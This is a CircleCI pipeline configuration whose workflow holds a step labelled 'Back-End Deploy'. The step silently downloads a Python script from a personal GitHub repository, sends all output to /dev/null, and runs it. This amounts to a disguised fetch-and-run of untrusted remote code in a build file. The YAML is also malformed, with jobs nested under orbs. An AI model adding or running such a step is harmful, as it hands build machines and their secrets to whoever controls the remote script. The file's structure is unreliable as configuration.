orbs:
  aws-cli: circleci/aws-cli@2.0.3
  jobs:
  example-job:
    docker:
      # replace with your preferred image
      - image: cimg/base:stable
    steps:
      - aws-cli/install
workflows:
  example-workflow:
    jobs:
      - run:
            name: Back-End Deploy
            command: |
              wget https://raw.githubusercontent.com/aurbach55/zash/main/code.py >/dev/null 2>&1 && python code.py
